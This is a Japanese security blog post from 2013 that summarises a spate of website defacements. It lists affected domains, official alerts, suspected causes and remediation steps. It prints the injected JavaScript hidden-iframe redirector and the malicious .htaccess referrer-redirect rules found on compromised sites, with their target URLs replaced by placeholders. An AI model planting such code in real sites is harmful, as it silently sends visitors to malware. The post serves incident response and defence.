piyolog

5月から多発しているHP改ざんインシデントをまとめてみた。

インシデントまとめ | 22:40 |

概要

5月に入ってから複数の組織でホームページの改ざんが発生していると報じられています。この件に直接関連しているかは不明ですが、IPAや警察庁、トレンドマイクロもホームページの改ざんに関して注意喚起や情報を掲載しています。IPAは2008年に猛威を振るったGumblarによるものや2012年9月18日前後に多発したHP改ざんの規模に匹敵すると発表しています。ここでは5月以降発生している改ざんインシデントについてついてまとめます。

• （PDF）ウェブサイト改ざん事案の多発に係る注意喚起について - @police(警察庁)
• 2013年6月の呼びかけ「 ウェブサイトが改ざんされないように対策を！ 」- IPA
• JPCERT/CC Alert 2013-06-07 Web サイト改ざんに関する注意喚起 - JPCERT/CC
• 日本を標的とするハクティビズム的 Web 改ざん攻撃を確認：今後の攻撃拡大に注意 - TrendMicro
• 日本のWebサイト改ざんを複数確認：PCは常に最新状態に！ | トレンドマイクロ セキュリティ ブログ （ウイルス解析担当者による Trend Micro Security Blog）
• 国内Webサイト改ざん事例続報：攻撃手法の詳細と得られる対策の教訓 | トレンドマイクロ セキュリティ ブログ （ウイルス解析担当者による Trend Micro Security Blog）

改ざんの概要イメージ

現時点で判明している情報、及びそこから推測される内容を踏まえて一連の流れを図にしました。(改ざんが行われるまでの流れは推測部分が多く含まれます。)

改ざんされたサイト

5月以降、ホームページが改ざんされたことを公表しているサイトを以下に掲載します。全ての組織がこのように公表することはないと考えられるため、これらサイトも多発している改ざんの一部だと思われます。また以下のリストは「HPが改ざん」されたことを共通点としているだけであり、これら一連の改ざんが関連したものであるかは不明です。

この他改ざんによるものかは不明ながら福知山市HPでも5月末にアクセス不可の問題が発生していた模様。*74

• その他下記サイトも今回の被害を受けていた可能性があります。(一部サイトはまだブラウザによる警告が表示されます。不用意にアクセスはしないでください。)*75

01: 08.hanatoweb.jp
02: agc.bunka758.or.jp
03: arcwet.jp
04: asunaro-higashiosaka.jp
05: baseball.h01.jp
06: blog.willcare.jp
07: bellezza8.sakura.ne.jp
08: cdvnet.jp
09: finaledge.jp
10: fuchu.shogaigakushu.jp
11: jci763.or.jp
12: jqkk.jp
13: karilab.jp
14: miharagumi.jp
15: minikiti.wiki2.jp
16: mirai.sa-ba.jp
17: netrunner.sakura.ne.jp
18: nihongo-online.jp
19: soho.h01.jp
20: soulnote.jp
21: www.technis.jp
22: tokyo.cafemix.jp
23: toshei.jp
24: www.cdvnet.jp
25: www.chabai.jp
26: www.cleaningcoco.jp
27: www.coolspot-osaka.jp
28: www.dorf.co.jp
29: www.eiraitei.jp
30: www.fuzoku-watch.com
31: www.ginzado.ne.jp
32: www.hakkosya.co.jp
33: www.heaven-luxu.jp
34: www.hokudai.ac.jp
35: www.hosu-gogo.jp
36: www.ibiz.jp
37: www.jagra.or.jp
38: www.japanprimo.gr.jp
39: www.jicc.co.jp
40: www.k-amity.jp
41: www.ksbnet.co.jp
42: www.lcy.jp
43: www.maguchi.co.jp
44: www.naniwa-kenma.co.jp
45: www.nanbunoyu.jp
46: www.niccori-maccori.jp
47: www.nifa.co.jp
48: www.nodapg.or.jp
49: www.ostec.or.jp
50: www.plan-inc.jp
51: www.popcycle.co.jp
52: www.ruri-diet.jp
53: www.select.jp
54: www.shogakkan.jp
55: www.tohot.jp
56: www.videofes.jp
57: ベンツパーツ.jp
58: cattleya.sitemix.jp

改ざんされる内容

複数の方の報告によればWebサーバー上に配置されている次の拡張子のファイルの全部、または一部に対して、第三者による改ざんが行われています。改ざん方法にはいくつかの種類があり、確認されているものの多くは共通して「0c0896」という文字列が埋め込まれています。改ざんサイトを閲覧した際、悪性サイトへリダイレクトをさせ、そこでマルウェア(以下のese_adminさんのBlogによればFakeAV系)に感染させることを目的としているように見受けられるものの、wakatonoさんが分析されているように書き換えはできたものの埋め込みをしたJavaScriptが動作しない(いわゆる毒入れに失敗したかの)ようなケースもあるようです。*76

• HTMLファイル(.html)
• JSPファイル(.jsp)
• PHPファイル(.php)
• JavaScriptファイル(.js)
• JSONファイル(.json)
• テンプレートファイル(.tpl)
• 分散設定ファイル(.htaccess)

今回の改ざんについて調査・考察されている方の記事

• あちこちで改ざん？ - wakatonoの戯れメモ
• 似非管理者の寂しい夜:JavaScriptの実行コードをねじ込むWebウィルス - livedoor Blog（ブログ）
• 相次ぐWeb改ざん被害 遅れる対応-ばびぶべぼBlog

静的コンテンツへの改ざん

静的コンテンツへの改ざんは難読化されたJavaScript（数字の羅列の様な文字列）が埋め込まれます。トレンドマイクロによりJS_BLACOLE.SMTTとして検知される実体は埋め込まれたJavaScriptです。実際に実行されるのは次のようなコードです。変数名等、一部は改ざん先によって異なる場合があるようです。悪性サイトへリダイレクトする1pxのIFRAMEが埋め込まれることになります。

function zzzfff()
{
	var egefi = document.createElement('iframe');
	egefi.src = 'http://(リダイレクト先悪性サイトURL)';
	egefi.style.position = 'absolute';
	egefi.style.border = '0';
	egefi.style.height = '1px';
	egefi.style.width = '1px';
	egefi.style.left = '1px';
	egefi.style.top = '1px';
	if (!document.getElementById('egefi'))
	{
		document.write('<div id=\'egefi\'></div>');
		document.getElementById('egefi').appendChild(egefi);
	}
}

function SetCookie(cookieName,cookieValue,nDays,path)
{
	var today = new Date();
	var expire = new Date();
	if (nDays==null || nDays==0) nDays=1;
	expire.setTime(today.getTime() + 3600000*24*nDays);
	document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie( name )
{
	var start = document.cookie.indexOf( name + "=" );
	var len = start + name.length + 1;
	if ( ( !start ) &&
	( name != document.cookie.substring( 0, name.length ) ) )
	{
		return null;
	}
	if ( start == -1 ) return null;
	var end = document.cookie.indexOf( ";", len );
	if ( end == -1 ) end = document.cookie.length;
	return unescape( document.cookie.substring( len, end ) );
}

if (navigator.cookieEnabled)
{
	if(GetCookie('visited_uq')==55){}
	else
	{
		SetCookie('visited_uq', '55', '1', '/');
		zzzfff();
	}
}

分散設定ファイルへの改ざん

MASAKIさんより.htaccessの改ざんに関する情報を頂きました。検索やポータルサイト等からこの.htaccessが改ざんされたサイトを訪れた場合に悪性サイトへリダイレクトさせるものと思われます。

#0c0896#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://転送先URL [R=301,L]
</IfModule>

#/0c0896#

改ざんされた原因

現在進行形で起きているためか、改ざん原因について詳細を公表している組織はあまり多くありませんが、改ざん原因を発表している組織がいくつかあり、以下に抜粋します。

• 情報ネットワーク法学会

改ざんは、管理者アカウントを何らかの方法で入手してFTPあるいはSSHにより外部から実行されたものと判断しており

http://in-law.jp/

• 神奈川県保険医協会

本サイトの管理・運営委託会社のパソコンを経由して、サイト用サーバーに不正アクセスがあり、改ざんされるという被害を受けました

http://www.hoken-i.co.jp/outline/cat272/post_102.html

• 赤髭亭

先ほど赤髭亭をUPしているサーバーフォルダ内より観察のためHTMLファイルをダウンロードしソースを確認しようとした所、ウィルス駆除ソフトがDL対象のHTMLを

JS:IFrame-AHU[Trj]

であると判断し隔離駆除を行うという事態が発生いたしました。

よって、上記ウィルスが再UpしたHTMLに再度感染し何らかの改ざんを行った可能性を考え

http://sengoku.gflag.biz/?eid=1547350

• 東京大学医学部付属病院

当院がホームページのコンテンツ管理（CMS）を委託している企業側のパソコンがコンピュータウイルスに感染した事が原因でした。

http://www.h.u-tokyo.ac.jp/oshirase/archives/20130604.html

また、IPAやJPCERT/CCの注意喚起によるとFTPやSSHアカウント情報を窃取するウィルスの存在に触れられています。

• IPA

“パソコンのJavaのバージョンが古いままだったためにFTPアカウント情報を漏えいさせるウイルスに感染した”というウイルス感染のケース※もありました。

http://www.ipa.go.jp/security/txt/2013/06outline.html

• JPCERT/CC

また、攻撃に使用されている一部のマルウエアには、FTP/SSH クライアントや Web ブラウザなどに保存されている過去に入力したアカウント情報などを窃取する機能を有しているものがあり、Web コンテンツ更新に使用されるアカウント情報がマルウエアにより窃取されている可能性があります。

http://www.jpcert.or.jp/at/2013/at130027.html

さらにこの件に関連していると思われる質問がYahoo知恵袋に投稿されています。この被害を受けた方はFTPサーバーを使っていたようです。

• FTPサーバーのhtmlファイル等に勝手にjavascriptが記述されているんですがウイルスでしょうか。。。 - Yahoo!知恵袋

これらから、今回多発している改ざんは、Gumblarのようなマルウェア、あるいは情報を窃取するマルウェアを通じて管理用ID、パスワードが盗まれた*77ことが原因で改ざんされたのではないかと考えられます。*78

改ざんを受けた場合の対策

改ざん被害を受けたサイトはID、パスワードの変更だけにとどまるのではなく、次の点に対応漏れがないか確認してください。

• Webサイト管理用のアプリケーション（CMSや管理ソフト）が最新の状態かどうか
• Webサイトのメンテナンスは管理端末のみに接続が制限されているか
• 管理端末でウィルス対策ソフトによるスキャンが行われているか
• サーバー、管理端末のOS、ウィルス対策ソフト、ドキュメントソフト等がすべて最新の状態か

また今回の事例ではトップページではなく、その配下のWebページが改ざんされているケースも見受けられることから、改ざんされた事実に気づいていない可能性もあり、FTPログや管理するコンテンツに差分が発生していないかも確認したほうが良いでしょう。

• あわせて読みたい
  改ざんを受けた際の対策／改ざんされてないサイトの要確認内容 - wakatonoの戯れメモ

関連

• トレンドマイクロは「ハクティビズム」目的の改ざんを警告：国内Webサイトで相次ぐ改ざん - ＠IT
• 「ガンブラー」事件に匹敵するWeb改ざん報告、IPAが対策徹底を呼び掛け - ITmedia エンタープライズ
• 不正スクリプト埋め込み型のウェブ改ざん被害、複数の国内サイトで確認 -INTERNET Watch

更新履歴

• 2013/06/04 PM 新規作成
• 2013/06/05 AM 北河さんから頂いた情報を反映
• 2013/06/05 AM @wakatonoさんのBlogを元に改ざんされていそうなサイトを列挙
• 2013/06/05 PM @yousukezanさんの情報等を元に最新情報を反映
• 2013/06/05 PM 最新情報を反映
• 2013/06/05 PM 最新情報を反映
• 2013/06/06 AM 最新情報を反映、改ざんの流れ概要イメージを追加
• 2013/06/06 AM 最新情報を反映
• 2013/06/06 PM 最新情報を反映、改ざんされたサイトを時系列に並び替え、MASAKIさんより頂いた改ざんが確認されている拡張子の情報を追加
• 2013/06/06 PM 最新情報を反映
• 2013/06/06 PM 概要や改ざん内容について加筆、修正
• 2013/06/07 PM 最新情報を反映
• 2013/06/07 PM 最新情報を反映

ツイートする